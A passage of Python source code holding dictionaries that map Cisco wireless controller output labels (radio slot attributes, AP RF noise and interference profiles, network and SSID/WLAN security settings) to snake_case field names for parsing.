'slot_0_cleanair_management_information_cleanair_management_administration_st',\n 'CleanAir Management Operation State': 'slot_0_cleanair_management_information_cleanair_management_operation_state',\n 'Rapid Update Mode': 'slot_0_cleanair_management_information_rapid_update_mode',\n 'Spectrum Expert connection': 'slot_0_cleanair_management_information_spectrum_expert_connection',\n 'CleanAir NSI Key': 'slot_0_cleanair_management_information_spectrum_expert_connection_cleanair_nsi_key',\n 'Spectrum Expert Connections counter': 'slot_0_cleanair_management_information_spectrum_expert_connection_spectrum_expert_connections_counter',\n 'CleanAir Sensor State': 'slot_0_cleanair_management_information_cleanair_sensor_state',\n 'Radio Extended Configurations': 'slot_0_radio_extended_configurations',\n 'Beacon period': 'slot_0_radio_extended_configurations_beacon_period',\n 'Beacon range': 'slot_0_radio_extended_configurations_beacon_range',\n 'Multicast buffer': 'slot_0_radio_extended_configurations_multicast_buffer',\n 'Multicast data-rate': 'slot_0_radio_extended_configurations_multicast_data_rate',\n 'RX SOP threshold': 'slot_0_radio_extended_configurations_rx_sop_threshold',\n 'CCA threshold': 'slot_0_radio_extended_configurations_cca_threshold',\n 'Attributes for Slot 1': 'slot_1',\n 'Radio Type1': 'slot_1_radio_type',\n 'Radio Subband': 'slot_1_radio_subband',\n 'Administrative State2': 'slot_1_administrative_state',\n 'Operation State2': 'slot_1_operation_state',\n 'Mesh Radio Role1': 'slot_1_mesh_radio_role',\n 'Radio Role1': 'slot_1_radio_role',\n 'CellId1': 'slot_1_cellid',\n 'Station Configuration1': 'slot_1_station_configuration',\n 'Configuration5': 'slot_1_configuration',\n 'Number Of WLANs1': 'slot_1_number_of_wlans',\n 'Medium Occupancy Limit1': 'slot_1_medium_occupancy_limit',\n 'CFP Period1': 'slot_1_cfp_period',\n 'CFP MaxDuration1': 'slot_1_cfp_maxduration',\n 'BSSID1': 'slot_1_bssid',\n 'Operation Rate Set1': 'slot_1_operation_rate_set',\n '6000 Kilo Bits1': 'slot_1_operation_rate_set_6000_kilo_bits',\n '9000 Kilo Bits1': 'slot_1_operation_rate_set_9000_kilo_bits',\n '12000 Kilo Bits1': 'slot_1_operation_rate_set_12000_kilo_bits',\n '18000 Kilo Bits1': 'slot_1_operation_rate_set_18000_kilo_bits',\n '24000 Kilo Bits1': 'slot_1_operation_rate_set_24000_kilo_bits',\n '36000 Kilo Bits1': 'slot_1_operation_rate_set_36000_kilo_bits',\n '48000 Kilo Bits1': 'slot_1_operation_rate_set_48000_kilo_bits',\n '54000 Kilo Bits1': 'slot_1_operation_rate_set_54000_kilo_bits',\n 'MCS Set1': 'slot_1_mcs_set',\n 'MCS 01': 'slot_1_mcs_set_mcs_0',\n 'MCS 32': 'slot_1_mcs_set_mcs_3',\n 'MCS 41': 'slot_1_mcs_set_mcs_4',\n 'MCS 51': 'slot_1_mcs_set_mcs_5',\n 'MCS 61': 'slot_1_mcs_set_mcs_6',\n 'MCS 71': 'slot_1_mcs_set_mcs_7',\n 'MCS 81': 'slot_1_mcs_set_mcs_8',\n 'MCS 91': 'slot_1_mcs_set_mcs_9',\n 'MCS 101': 'slot_1_mcs_set_mcs_10',\n 'MCS 111': 'slot_1_mcs_set_mcs_11',\n 'MCS 121': 'slot_1_mcs_set_mcs_12',\n 'MCS 131': 'slot_1_mcs_set_mcs_13',\n 'MCS 141': 'slot_1_mcs_set_mcs_14',\n 'MCS 151': 'slot_1_mcs_set_mcs_15',\n 'MCS 161': 'slot_1_mcs_set_mcs_16',\n 'MCS 171': 'slot_1_mcs_set_mcs_17',\n 'MCS 181': 'slot_1_mcs_set_mcs_18',\n 'MCS 191': 'slot_1_mcs_set_mcs_19',\n 'MCS 201': 'slot_1_mcs_set_mcs_20',\n 'MCS 211': 'slot_1_mcs_set_mcs_21',\n 'MCS 221': 'slot_1_mcs_set_mcs_22',\n 'MCS 231': 'slot_1_mcs_set_mcs_23',\n 'MCS 241': 'slot_1_mcs_set_mcs_24',\n 'MCS 251': 'slot_1_mcs_set_mcs_25',\n 'MCS 261': 'slot_1_mcs_set_mcs_26',\n 'MCS 271': 'slot_1_mcs_set_mcs_27',\n 'MCS 281': 'slot_1_mcs_set_mcs_28',\n 'MCS 291': 'slot_1_mcs_set_mcs_29',\n 'MCS 301': 'slot_1_mcs_set_mcs_30',\n 'MCS 311': 'slot_1_mcs_set_mcs_31',\n '802.11ac MCS Set1': 'slot_1_802_11ac_mcs_set',\n 'Nss=1: MCS 0-91': 'slot_1_802_11ac_mcs_set_nss_1_mcs_0_9',\n 'Nss=2: MCS 0-91': 'slot_1_802_11ac_mcs_set_nss_2_mcs_0_9',\n 'Nss=3: MCS 0-91': 'slot_1_802_11ac_mcs_set_nss_3_mcs_0_9',\n 'Nss=4: MCS 0-71': 'slot_1_802_11ac_mcs_set_nss_4_mcs_0_7',\n 'Nss=4: MCS 0-91': 'slot_1_802_11ac_mcs_set_nss_4_mcs_0_9',\n 'Beacon Period1': 'slot_1_beacon_period',\n 'Fragmentation Threshold2': 'slot_1_fragmentation_threshold',\n 'Multi Domain Capability Implemented1': 'slot_1_multi_domain_capability_implemented',\n 'Multi Domain Capability Enabled1': 'slot_1_multi_domain_capability_enabled',\n 'Country String1': 'slot_1_country_string',\n 'Multi Domain Capability1': 'slot_1_multi_domain_capability',\n 'Configuration6': 'slot_1_multi_domain_capability_configuration',\n 'First Chan Num1': 'slot_1_multi_domain_capability_first_chan_num',\n 'Number Of Channels1': 'slot_1_multi_domain_capability_number_of_channels',\n 'MAC Operation Parameters1': 'slot_1_mac_operation_parameters',\n 'Configuration7': 'slot_1_mac_operation_parameters_configuration',\n 'Fragmentation Threshold3': 'slot_1_mac_operation_parameters_fragmentation_threshold',\n 'Packet Retry Limit1': 'slot_1_mac_operation_parameters_packet_retry_limit',\n 'Tx Power1': 'slot_1_tx_power',\n 'Num Of Supported Power Levels1': 'slot_1_tx_power_num_of_supported_power_levels',\n 'Tx Power Level 11': 'slot_1_tx_power_tx_power_level_1',\n 'Tx Power Level 21': 'slot_1_tx_power_tx_power_level_2',\n 'Tx Power Level 31': 'slot_1_tx_power_tx_power_level_3',\n 'Tx Power Level 41': 'slot_1_tx_power_tx_power_level_4',\n 'Tx Power Level 51': 'slot_1_tx_power_tx_power_level_5',\n 'Tx Power Level 61': 'slot_1_tx_power_tx_power_level_6',\n 'Tx Power Level 71': 'slot_1_tx_power_tx_power_level_7',\n 'Tx Power Level 81': 'slot_1_tx_power_tx_power_level_8',\n 'Tx Power Configuration1': 'slot_1_tx_power_tx_power_configuration',\n 'Current Tx Power Level1': 'slot_1_tx_power_current_tx_power_level',\n 'Tx Power Assigned By1': 'slot_1_tx_power_tx_power_assigned_by',\n 'Phy OFDM parameters1': 'slot_1_phy_ofdm_parameters',\n 'Configuration8': 'slot_1_phy_ofdm_parameters_configuration',\n 'Current Channel1': 'slot_1_phy_ofdm_parameters_current_channel',\n 'Channel Assigned By1': 'slot_1_phy_ofdm_parameters_channel_assigned_by',\n 'Extension Channel1': 'slot_1_phy_ofdm_parameters_extension_channel',\n 'Channel Width1': 'slot_1_phy_ofdm_parameters_channel_width',\n 'Allowed Channel List1': 'slot_1_phy_ofdm_parameters_allowed_channel_list',\n '1': 'slot_1_phy_ofdm_parameters_allowed_channel_list_',\n 'TI Threshold1': 'slot_1_phy_ofdm_parameters_ti_threshold',\n 'DCA Channel List1': 'slot_1_phy_ofdm_parameters_dca_channel_list',\n 'Legacy Tx Beamforming Configuration1': 'slot_1_phy_ofdm_parameters_legacy_tx_beamforming_configuration',\n 'Legacy Tx Beamforming1': 'slot_1_phy_ofdm_parameters_legacy_tx_beamforming',\n 'Antenna Type1': 'slot_1_phy_ofdm_parameters_antenna_type',\n 'Internal Antenna Gain (in .5 dBi units)1': 'slot_1_phy_ofdm_parameters_internal_antenna_gain_in_5_dbi_units',\n 'Diversity1': 'slot_1_phy_ofdm_parameters_diversity',\n '802.11n Antennas1': 'slot_1_phy_ofdm_parameters_802_11n_antennas',\n 'A1': 'slot_1_phy_ofdm_parameters_802_11n_antennas_a',\n 'B1': 'slot_1_phy_ofdm_parameters_802_11n_antennas_b',\n 'C1': 'slot_1_phy_ofdm_parameters_802_11n_antennas_c',\n 'D1': 'slot_1_phy_ofdm_parameters_802_11n_antennas_d',\n 'Performance Profile Parameters1': 'slot_1_performance_profile_parameters',\n 'Interference threshold1': 'slot_1_performance_profile_parameters_interference_threshold',\n 'Noise threshold1': 'slot_1_performance_profile_parameters_noise_threshold',\n 'RF utilization threshold1': 'slot_1_performance_profile_parameters_rf_utilization_threshold',\n 'Data-rate threshold1': 'slot_1_performance_profile_parameters_data_rate_threshold',\n 'Client threshold1': 'slot_1_performance_profile_parameters_client_threshold',\n 'Coverage SNR threshold1': 'slot_1_performance_profile_parameters_coverage_snr_threshold',\n 'Coverage exception level1': 'slot_1_performance_profile_parameters_coverage_exception_level',\n 'Client minimum exception level1': 'slot_1_performance_profile_parameters_client_minimum_exception_level',\n 'Rogue Containment Information1': 'slot_1_rogue_containment_information',\n 'Containment Count1': 'slot_1_containment_count',\n 'CleanAir Management Information1': 'slot_1_cleanair_management_information',\n 'CleanAir Capable1': 'slot_1_cleanair_management_information_cleanair_capable',\n 'CleanAir Management Administration St1': 'slot_1_cleanair_management_information_cleanair_management_administration_st',\n 'CleanAir Management Operation State1': 'slot_1_cleanair_management_information_cleanair_management_operation_state',\n 'Rapid Update Mode1': 'slot_1_cleanair_management_information_rapid_update_mode',\n 'Spectrum Expert connection1': 'slot_1_cleanair_management_information_spectrum_expert_connection',\n 'CleanAir NSI Key1': 'slot_1_cleanair_management_information_spectrum_expert_connection_cleanair_nsi_key',\n 'Spectrum Expert Connections counter1': 'slot_1_cleanair_management_information_spectrum_expert_connection_spectrum_expert_connections_counter',\n 'CleanAir Sensor State1': 'slot_1_cleanair_management_information_cleanair_sensor_state',\n 'Radio Extended Configurations1': 'slot_1_radio_extended_configurations',\n 'Beacon period1': 'slot_1_radio_extended_configurations_beacon_period',\n 'Beacon range1': 'slot_1_radio_extended_configurations_beacon_range',\n 'Multicast buffer1': 'slot_1_radio_extended_configurations_multicast_buffer',\n 'Multicast data-rate1': 'slot_1_radio_extended_configurations_multicast_data_rate',\n 'RX SOP threshold1': 'slot_1_radio_extended_configurations_rx_sop_threshold',\n 'CCA threshold1': 'slot_1_radio_extended_configurations_cca_threshold',\n}\n\nap_rf_parsing_dict = {\n 'AP Name': 'ap_name',\n 'MAC Address': 'mac_address',\n 'Slot ID': 'slot_id',\n 'Radio Type': 'radio_type',\n 'Sub-band Type': 'sub_band_type',\n 'Noise Profile': 'noise_profile',\n 'Channel 1': 'noise_profile_channel_1',\n 'Channel 2': 'noise_profile_channel_2',\n 'Channel 3': 'noise_profile_channel_3',\n 'Channel 4': 'noise_profile_channel_4',\n 'Channel 5': 'noise_profile_channel_5',\n 'Channel 6': 'noise_profile_channel_6',\n 'Channel 7': 'noise_profile_channel_7',\n 'Channel 8': 'noise_profile_channel_8',\n 'Channel 9': 'noise_profile_channel_9',\n 'Channel 10': 'noise_profile_channel_10',\n 'Channel 11': 'noise_profile_channel_11',\n 'Channel 12': 'noise_profile_channel_12',\n 'Channel 13': 'noise_profile_channel_13',\n 'Channel 14': 'noise_profile_channel_14',\n 'Channel 34': 'noise_profile_channel_34',\n 'Channel 36': 'noise_profile_channel_36',\n 'Channel 38': 'noise_profile_channel_38',\n 'Channel 40': 'noise_profile_channel_40',\n 'Channel 42': 'noise_profile_channel_42',\n 'Channel 44': 'noise_profile_channel_44',\n 'Channel 46': 'noise_profile_channel_46',\n 'Channel 48': 'noise_profile_channel_48',\n 'Channel 52': 'noise_profile_channel_52',\n 'Channel 56': 'noise_profile_channel_56',\n 'Channel 60': 'noise_profile_channel_60',\n 'Channel 64': 'noise_profile_channel_64',\n 'Channel 100': 'noise_profile_channel_100',\n 'Channel 104': 'noise_profile_channel_104',\n 'Channel 108': 'noise_profile_channel_108',\n 'Channel 112': 'noise_profile_channel_112',\n 'Channel 116': 'noise_profile_channel_116',\n 'Channel 120': 'noise_profile_channel_120',\n 'Channel 124': 'noise_profile_channel_124',\n 'Channel 128': 'noise_profile_channel_128',\n 'Channel 132': 'noise_profile_channel_132',\n 'Channel 136': 'noise_profile_channel_136',\n 'Channel 140': 'noise_profile_channel_140',\n 'Channel 144': 'noise_profile_channel_144',\n 'Channel 149': 'noise_profile_channel_149',\n 'Channel 153': 'noise_profile_channel_153',\n 'Channel 157': 'noise_profile_channel_157',\n 'Channel 161': 'noise_profile_channel_161',\n 'Channel 165': 'noise_profile_channel_165',\n 'Channel 169': 'noise_profile_channel_169',\n 'Channel 173': 'noise_profile_channel_173',\n 'Interference Profile': 'interference_profile',\n 'Channel 15': 'interference_profile_channel_1',\n 'Channel 21': 'interference_profile_channel_2',\n 'Channel 31': 'interference_profile_channel_3',\n 'Channel 41': 'interference_profile_channel_4',\n 'Channel 51': 'interference_profile_channel_5',\n 'Channel 61': 'interference_profile_channel_6',\n 'Channel 71': 'interference_profile_channel_7',\n 'Channel 81': 'interference_profile_channel_8',\n 'Channel 91': 'interference_profile_channel_9',\n 'Channel 101': 'interference_profile_channel_10',\n 'Channel 111': 'interference_profile_channel_11',\n 'Channel 121': 'interference_profile_channel_12',\n 'Channel 131': 'interference_profile_channel_13',\n 'Channel 141': 'interference_profile_channel_14',\n 'Channel 341': 'interference_profile_channel_34',\n 'Channel 361': 'interference_profile_channel_36',\n 'Channel 381': 'interference_profile_channel_38',\n 'Channel 401': 'interference_profile_channel_40',\n 'Channel 421': 'interference_profile_channel_42',\n 'Channel 441': 'interference_profile_channel_44',\n 'Channel 461': 'interference_profile_channel_46',\n 'Channel 481': 'interference_profile_channel_48',\n 'Channel 521': 'interference_profile_channel_52',\n 'Channel 561': 'interference_profile_channel_56',\n 'Channel 601': 'interference_profile_channel_60',\n 'Channel 641': 'interference_profile_channel_64',\n 'Channel 1001': 'interference_profile_channel_100',\n 'Channel 1041': 'interference_profile_channel_104',\n 'Channel 1081': 'interference_profile_channel_108',\n 'Channel 1121': 'interference_profile_channel_112',\n 'Channel 1161': 'interference_profile_channel_116',\n 'Channel 1201': 'interference_profile_channel_120',\n 'Channel 1241': 'interference_profile_channel_124',\n 'Channel 1281': 'interference_profile_channel_128',\n 'Channel 1321': 'interference_profile_channel_132',\n 'Channel 1361': 'interference_profile_channel_136',\n 'Channel 1401': 'interference_profile_channel_140',\n 'Channel 1441': 'interference_profile_channel_144',\n 'Channel 1491': 'interference_profile_channel_149',\n 'Channel 1531': 'interference_profile_channel_153',\n 'Channel 1571': 'interference_profile_channel_157',\n 'Channel 1611': 'interference_profile_channel_161',\n 'Channel 1651': 'interference_profile_channel_165',\n 'Channel 1691': 'interference_profile_channel_169',\n 'Channel 1731': 'interference_profile_channel_173',\n 'Rogue Histogram': 'rogue_histogram',\n 'Channel 16': 'rogue_histogram_channel_1',\n 'Channel 22': 'rogue_histogram_channel_2',\n 'Channel 32': 'rogue_histogram_channel_3',\n 'Channel 43': 'rogue_histogram_channel_4',\n 'Channel 53': 'rogue_histogram_channel_5',\n 'Channel 62': 'rogue_histogram_channel_6',\n 'Channel 72': 'rogue_histogram_channel_7',\n 'Channel 82': 'rogue_histogram_channel_8',\n 'Channel 92': 'rogue_histogram_channel_9',\n 'Channel 102': 'rogue_histogram_channel_10',\n 'Channel 113': 'rogue_histogram_channel_11',\n 'Channel 122': 'rogue_histogram_channel_12',\n 'Channel 133': 'rogue_histogram_channel_13',\n 'Channel 142': 'rogue_histogram_channel_14',\n 'Channel 342': 'rogue_histogram_channel_34',\n 'Channel 362': 'rogue_histogram_channel_36',\n 'Channel 382': 'rogue_histogram_channel_38',\n 'Channel 402': 'rogue_histogram_channel_40',\n 'Channel 422': 'rogue_histogram_channel_42',\n 'Channel 442': 'rogue_histogram_channel_44',\n 'Channel 462': 'rogue_histogram_channel_46',\n 'Channel 482': 'rogue_histogram_channel_48',\n 'Channel 522': 'rogue_histogram_channel_52',\n 'Channel 562': 'rogue_histogram_channel_56',\n 'Channel 602': 'rogue_histogram_channel_60',\n 'Channel 642': 'rogue_histogram_channel_64',\n 'Channel 1002': 'rogue_histogram_channel_100',\n 'Channel 1042': 'rogue_histogram_channel_104',\n 'Channel 1082': 'rogue_histogram_channel_108',\n 'Channel 1122': 'rogue_histogram_channel_112',\n 'Channel 1162': 'rogue_histogram_channel_116',\n 'Channel 1202': 'rogue_histogram_channel_120',\n 'Channel 1242': 'rogue_histogram_channel_124',\n 'Channel 1282': 'rogue_histogram_channel_128',\n 'Channel 1322': 'rogue_histogram_channel_132',\n 'Channel 1362': 'rogue_histogram_channel_136',\n 'Channel 1402': 'rogue_histogram_channel_140',\n 'Channel 1442': 'rogue_histogram_channel_144',\n 'Channel 1492': 'rogue_histogram_channel_149',\n 'Channel 1532': 'rogue_histogram_channel_153',\n 'Channel 1572': 'rogue_histogram_channel_157',\n 'Channel 1612': 'rogue_histogram_channel_161',\n 'Channel 1652': 'rogue_histogram_channel_165',\n 'Channel 1692': 'rogue_histogram_channel_169',\n 'Channel 1732': 'rogue_histogram_channel_173',\n 'Load Profile': 'load_profile',\n 'Receive Utilization': 'load_profile_receive_utilization',\n 'Transmit Utilization': 'load_profile_transmit_utilization',\n 'Channel Utilization': 'load_profile_channel_utilization',\n 'Attached Clients': 'load_profile_attached_clients',\n 'Coverage Profile': 'coverage_profile',\n 'Failed Clients': 'failed_clients',\n 'Client Signal Strengths': 'client_signal_strengths',\n 'RSSI -100 dbm': 'client_signal_strengths_rssi_100_dbm',\n 'RSSI -92 dbm': 'client_signal_strengths_rssi_92_dbm',\n 'RSSI -84 dbm': 'client_signal_strengths_rssi_84_dbm',\n 'RSSI -76 dbm': 'client_signal_strengths_rssi_76_dbm',\n 'RSSI -68 dbm': 'client_signal_strengths_rssi_68_dbm',\n 'RSSI -60 dbm': 'client_signal_strengths_rssi_60_dbm',\n 'RSSI -52 dbm': 'client_signal_strengths_rssi_52_dbm',\n 'Client Signal To Noise Ratios': 'client_signal_to_noise_ratios',\n 'SNR 0 dB': 'client_signal_to_noise_ratios_snr_0_db',\n 'SNR 5 dB': 'client_signal_to_noise_ratios_snr_5_db',\n 'SNR 10 dB': 'client_signal_to_noise_ratios_snr_10_db',\n 'SNR 15 dB': 'client_signal_to_noise_ratios_snr_15_db',\n 'SNR 20 dB': 'client_signal_to_noise_ratios_snr_20_db',\n 'SNR 25 dB': 'client_signal_to_noise_ratios_snr_25_db',\n 'SNR 30 dB': 'client_signal_to_noise_ratios_snr_30_db',\n 'SNR 35 dB': 'client_signal_to_noise_ratios_snr_35_db',\n 'SNR 40 dB': 'client_signal_to_noise_ratios_snr_40_db',\n 'SNR 45 dB': 'client_signal_to_noise_ratios_snr_45_db',\n 'Radar Information': 'radar_information',\n 'Channel Assignment Information': 'channel_assignment_information',\n 'Current Channel Average Energy': 'channel_assignment_information_current_channel_average_energy',\n 'Previous Channel Average Energy': 'channel_assignment_information_previous_channel_average_energy',\n 'Channel Change Count': 'channel_assignment_information_channel_change_count',\n 'Last Channel Change Time': 'channel_assignment_information_last_channel_change_time',\n 'Recommended Best Channel': 'channel_assignment_information_recommended_best_channel',\n 'RF Parameter Recommendations': 'rf_parameter_recommendations',\n 'Power Level': 'rf_parameter_recommendations_power_level',\n 'RTS/CTS Threshold': 'rf_parameter_recommendations_rts_cts_threshold',\n 'Fragmentation Threshold': 'rf_parameter_recommendations_fragmentation_threshold',\n 'Antenna Pattern': 'rf_parameter_recommendations_antenna_pattern',\n}\n\nnetwork_config_parsing_dict = {\n 'RF-Network Name': 'rf_network_name',\n 'DNS Server IP': 'dns_server_ip',\n 'Web Mode': 'web_mode',\n 'Secure Web Mode': 'secure_web_mode',\n 'Secure Web Mode Cipher-Option High': 'secure_web_mode_cipher_option_high',\n 'Secure Web Mode SSL Protocol': 'secure_web_mode_ssl_protocol',\n 'Web CSRF check': 'web_csrf_check',\n 'OCSP': 'ocsp',\n 'OCSP responder URL': 'ocsp_responder_url',\n 'Secure Shell (ssh)': 'secure_shell_ssh',\n 'Secure Shell (ssh) Cipher-Option High': 'secure_shell_ssh_cipher_option_high',\n 'Telnet': 'telnet',\n 'Ethernet Multicast Forwarding': 'ethernet_multicast_forwarding',\n 'Ethernet Broadcast Forwarding': 'ethernet_broadcast_forwarding',\n 'IPv4 AP Multicast/Broadcast Mode': 'ipv4_ap_multicast_broadcast_mode',\n 'IPv6 AP Multicast/Broadcast Mode': 'ipv6_ap_multicast_broadcast_mode',\n 'IGMP snooping': 'igmp_snooping',\n 'IGMP timeout': 'igmp_timeout',\n 'IGMP Query Interval': 'igmp_query_interval',\n 'MLD snooping': 'mld_snooping',\n 'MLD timeout': 'mld_timeout',\n 'MLD query interval': 'mld_query_interval',\n 'User Idle Timeout': 'user_idle_timeout',\n 'ARP Idle Timeout': 'arp_idle_timeout',\n 'Cisco AP Default Master': 'cisco_ap_default_master',\n 'AP Join Priority': 'ap_join_priority',\n 'Mgmt Via Wireless Interface': 'mgmt_via_wireless_interface',\n 'Mgmt Via Dynamic Interface': 'mgmt_via_dynamic_interface',\n 'Bridge MAC filter Config': 'bridge_mac_filter_config',\n 'Bridge Security Mode': 'bridge_security_mode',\n 'Mesh Full Sector DFS': 'mesh_full_sector_dfs',\n 'Mesh Backhaul RRM': 'mesh_backhaul_rrm',\n 'AP Fallback': 'ap_fallback',\n 'Web Auth CMCC Support': 'web_auth_cmcc_support',\n 'Web Auth Redirect Ports': 'web_auth_redirect_ports',\n 'Web Auth Proxy Redirect': 'web_auth_proxy_redirect_',\n 'Web Auth Captive-Bypass': 'web_auth_captive_bypass__',\n 'Web Auth Secure Web': 'web_auth_secure_web_',\n 'Web Auth Secure Web Cipher Option': 'web_auth_secure_web_cipher_option_',\n 'Web Auth Secure Web Sslv3': 'web_auth_secure_web_sslv3_',\n 'Web Auth Secure Redirection': 'web_auth_secure_redirection_',\n 'Fast SSID Change': 'fast_ssid_change',\n 'AP Discovery - NAT IP Only': 'ap_discovery_nat_ip_only',\n 'IP/MAC Addr Binding Check': 'ip_mac_addr_binding_check',\n 'Link Local Bridging Status': 'link_local_bridging_status',\n 'CCX-lite status': 'ccx_lite_status',\n 'oeap-600 dual-rlan-ports': 'oeap_600_dual_rlan_ports',\n 'oeap local-network': 'oeap_local_network',\n 'oeap-600 Split Tunneling (Printers)': 'oeap_600_split_tunneling_printers',\n 'WebPortal Online Client': 'webportal_online_client',\n 'WebPortal NTF_LOGOUT Client': 'webportal_ntf_logout_client',\n 'mDNS snooping': 'mdns_snooping',\n 'mDNS Query Interval': 'mdns_query_interval',\n 'Web Color Theme': 'web_color_theme',\n 'Capwap Prefer Mode': 'capwap_prefer_mode',\n 'Network Profile': 'network_profile',\n 'Client ip conflict detection (DHCP)': 'client_ip_conflict_detection_dhcp',\n 'Mesh BH RRM': 'mesh_bh_rrm',\n 'Mesh Aggressive DCA': 'mesh_aggressive_dca',\n 'Mesh Auto RF': 'mesh_auto_rf',\n 'HTTP Profiling Port': 'http_profiling_port',\n 'HTTP-Proxy Ip Address': 'http_proxy_ip_address',\n 'HTTP-Proxy Port': 'http_proxy_port',\n 'WGB Client Forced L2 Roam': 'wgb_client_forced_l2_roam',\n}\n\nssid_config_parsing_dict = {\n 'WLAN Identifier': 'wlan_identifier',\n 'Profile Name': 'profile_name',\n 'Network Name (SSID)': 'network_name_ssid',\n 'Status': 'status',\n 'MAC Filtering': 'mac_filtering',\n 'Broadcast SSID': 'broadcast_ssid',\n 'AAA Policy Override': 'aaa_policy_override',\n 'Network Admission Control': 'network_admission_control',\n 'Client Profiling Status': 'client_profiling_status',\n 'Radius Profiling': 'client_profiling_status_radius_profiling',\n 'DHCP': 'client_profiling_status_radius_profiling_dhcp',\n 'HTTP': 'client_profiling_status_radius_profiling_http',\n 'Local Profiling': 'client_profiling_status_local_profiling',\n 'DHCP1': 'client_profiling_status_local_profiling_dhcp',\n 'HTTP1': 'client_profiling_status_local_profiling_http',\n 'Radius-NAC State': 'radius_nac_state',\n 'SNMP-NAC State': 'snmp_nac_state',\n 'Quarantine VLAN': 'quarantine_vlan',\n 'Maximum Clients Allowed': 'maximum_clients_allowed',\n 'Security Group Tag': 'security_group_tag',\n 'Maximum number of Clients per AP Radio': 'maximum_number_of_clients_per_ap_radio',\n 'ATF Policy': 'atf_policy',\n 'Number of Active Clients': 'number_of_active_clients',\n 'Exclusionlist': 'exclusionlist',\n 'Exclusionlist Timeout': 'exclusionlist_timeout',\n 'Session Timeout': 'session_timeout',\n 'User Idle Timeout': 'user_idle_timeout',\n 'Sleep Client': 'sleep_client',\n 'Sleep Client Timeout': 'sleep_client_timeout',\n 'Web Auth Captive Bypass Mode': 'web_auth_captive_bypass_mode',\n 'User Idle Threshold': 'user_idle_threshold',\n 'NAS-identifier': 'nas_identifier',\n 'CHD per WLAN': 'chd_per_wlan',\n 'Webauth DHCP exclusion': 'webauth_dhcp_exclusion',\n 'Interface': 'interface',\n 'Multicast Interface': 'multicast_interface',\n 'WLAN IPv4 ACL': 'wlan_ipv4_acl',\n 'WLAN IPv6 ACL': 'wlan_ipv6_acl',\n 'WLAN Layer2 ACL': 'wlan_layer2_acl',\n 'WLAN URL ACL': 'wlan_url_acl',\n 'mDNS Status': 'mdns_status',\n 'mDNS Profile Name': 'mdns_profile_name',\n 'DHCP Server': 'dhcp_server',\n 'Central NAT Peer-Peer Blocking': 'central_nat_peer_peer_blocking',\n 'DHCP Address Assignment Required': 'dhcp_address_assignment_required',\n 'Static IP client tunneling': 'static_ip_client_tunneling',\n 'Tunnel Profile': 'tunnel_profile',\n 'PMIPv6 Mobility Type': 'pmipv6_mobility_type',\n 'PMIPv6 MAG Profile': 'pmipv6_mobility_type_pmipv6_mag_profile',\n 'PMIPv6 Default Realm': 'pmipv6_mobility_type_pmipv6_default_realm',\n 'PMIPv6 NAI Type': 'pmipv6_mobility_type_pmipv6_nai_type',\n 'PMIPv6 MAG location': 'pmipv6_mobility_type_pmipv6_mag_location',\n 'Quality of Service': 'quality_of_service',\n 'Per-SSID Rate Limits': 'per_ssid_rate_limits',\n 'Average Data Rate': 'average_data_rate',\n 'Average Realtime Data Rate': 'average_realtime_data_rate',\n 'Burst Data Rate': 'burst_data_rate',\n 'Burst Realtime Data Rate': 'burst_realtime_data_rate',\n 'Per-Client Rate Limits': 'per_client_rate_limits',\n 'Average Data Rate1': 'average_data_rate',\n 'Average Realtime Data Rate1': 'average_realtime_data_rate',\n 'Burst Data Rate1': 'burst_data_rate',\n 'Burst Realtime Data Rate1': 'burst_realtime_data_rate',\n 'Scan Defer Priority': 'scan_defer_priority',\n 'Scan Defer Time': 'scan_defer_time',\n 'WMM': 'wmm',\n 'WMM UAPSD Compliant Client Support': 'wmm_uapsd_compliant_client_support',\n 'Media Stream Multicast-direct': 'media_stream_multicast_direct',\n 'CCX - AironetIe Support': 'ccx_aironetie_support',\n 'CCX - Gratuitous ProbeResponse (GPR)': 'ccx_gratuitous_proberesponse_gpr',\n 'CCX - Diagnostics Channel Capability': 'ccx_diagnostics_channel_capability',\n 'Dot11-Phone Mode (7920)': 'dot11_phone_mode_7920',\n 'Wired Protocol': 'wired_protocol',\n 'Passive Client Feature': 'passive_client_feature',\n 'Peer-to-Peer Blocking Action': 'peer_to_peer_blocking_action',\n 'Radio Policy': 'radio_policy',\n 'DTIM period for 802.11a radio': 'dtim_period_for_802_11a_radio',\n 'DTIM period for 802.11b radio': 'dtim_period_for_802_11b_radio',\n 'Radius Servers': 'radius_servers',\n 'Authentication': 'radius_servers_authentication',\n 'Accounting': 'radius_servers_accounting',\n 'Interim Update': 'radius_servers_accounting_interim_update',\n 'Interim Update Interval': 'radius_servers_accounting_interim_update_interval',\n 'Framed IPv6 Acct AVP': 'radius_servers_accounting_framed_ipv6_acct_avp',\n 'Dynamic Interface': 'radius_servers_dynamic_interface',\n 'Dynamic Interface Priority': 'radius_servers_dynamic_interface_priority',\n 'Local EAP Authentication': 'local_eap_authentication',\n 'Radius NAI-Realm': 'radius_nai_realm',\n 'Mu-Mimo': 'mu_mimo',\n 'Security': 'security',\n '802.11 Authentication:': 'security_802_11_authentication',\n 'FT Support': 'security_ft_support',\n 'Static WEP Keys': 'security_static_wep_keys',\n '802.1X': 'security_802_1x',\n 'Wi-Fi Protected Access (WPA/WPA2)': 'security_wi_fi_protected_access_wpa_wpa2',\n 'WPA (SSN IE)': 'security_wi_fi_protected_access_wpa_wpa2_wpa_ssn_ie',\n 'WPA2 (RSN IE)': 'security_wi_fi_protected_access_wpa_wpa2_wpa2_rsn_ie',\n 'TKIP Cipher': 'security_wi_fi_protected_access_wpa_wpa2_wpa2_rsn_ie_tkip_cipher',\n 'AES Cipher': 'security_wi_fi_protected_access_wpa_wpa2_wpa2_rsn_ie_aes_cipher',\n 'CCMP256 Cipher': 'security_wi_fi_protected_access_wpa_wpa2_wpa2_rsn_ie_ccmp256_cipher',\n 'GCMP128 Cipher': 'security_wi_fi_protected_access_wpa_wpa2_wpa2_rsn_ie_gcmp128_cipher',\n 'GCMP256 Cipher': 'security_wi_fi_protected_access_wpa_wpa2_wpa2_rsn_ie_gcmp256_cipher',\n 'OSEN IE': 'security_wi_fi_protected_access_wpa_wpa2_osen_ie',\n 'Auth Key Management': 'security_wi_fi_protected_access_wpa_wpa2_auth_key_management',\n '802.1x': 'security_wi_fi_protected_access_wpa_wpa2_auth_key_management_802_1x',\n 'PSK': 'security_wi_fi_protected_access_wpa_wpa2_auth_key_management_psk',\n 'CCKM': 'security_wi_fi_protected_access_wpa_wpa2_auth_key_management_cckm',\n 'FT-1X(802.11r)': 'security_wi_fi_protected_access_wpa_wpa2_auth_key_management_ft_1x802_11r',\n 'FT-PSK(802.11r)': 